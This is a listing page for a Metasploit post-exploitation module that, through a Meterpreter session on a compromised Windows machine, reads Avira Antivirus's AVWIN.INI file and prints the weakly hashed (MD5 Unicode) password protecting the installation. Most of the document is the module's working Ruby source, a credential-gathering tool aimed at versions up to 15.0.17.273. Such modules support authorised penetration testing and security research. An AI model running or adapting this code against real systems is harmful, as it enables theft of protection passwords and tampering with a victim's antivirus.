Windows Gather Avira Password Extraction

2016-07-26T12:03:51
ID MSF:POST/WINDOWS/GATHER/CREDENTIALS/AVIRA_PASSWORD
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module extracts the weakly hashed password which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/parser/ini'

class MetasploitModule &lt; Msf::Post
  include Msf::Post::Windows::Registry

  def initialize(info={})
    super( update_info( info,
        'Name'          =&gt; 'Windows Gather Avira Password Extraction',
        'Description'   =&gt; %q{
          This module extracts the weakly hashed password
          which is used to protect a Avira Antivirus (&lt;= 15.0.17.273) installation.
        },
        'License'       =&gt; MSF_LICENSE,
        'Author'        =&gt; [ 'Robert Kugler / robertchrk'],
        'Platform'      =&gt; [ 'win' ],
        'SessionTypes'  =&gt; [ 'meterpreter' ]
      ))
  end

  def run
    print_status("Checking default location...")
    check_programdata("C:\\ProgramData\\Avira\\Antivirus\\CONFIG\\AVWIN.INI")
  end

  def check_programdata(path)
    begin
      client.fs.file.stat(path)
      print_status("Found file at #{path}")
      get_ini(path)
    rescue
      print_status("#{path} not found ....")
    end
  end

  def get_ini(filename)
    config = client.fs.file.new(filename, 'r')
    parse = Rex::Text.to_ascii(config.read)
    ini = Rex::Parser::Ini.from_s(parse)

    if ini == {}
      print_error("Unable to parse file")
      return
    end

    print_status("Processing configuration file...")
    passwd = ini["COMMON"]['Password']
    passwd = passwd.delete "\""
    print_good("MD5(Unicode) hash found: #{passwd}")
    print_good("Info: Password length is limited to 20 characters.")
  end
end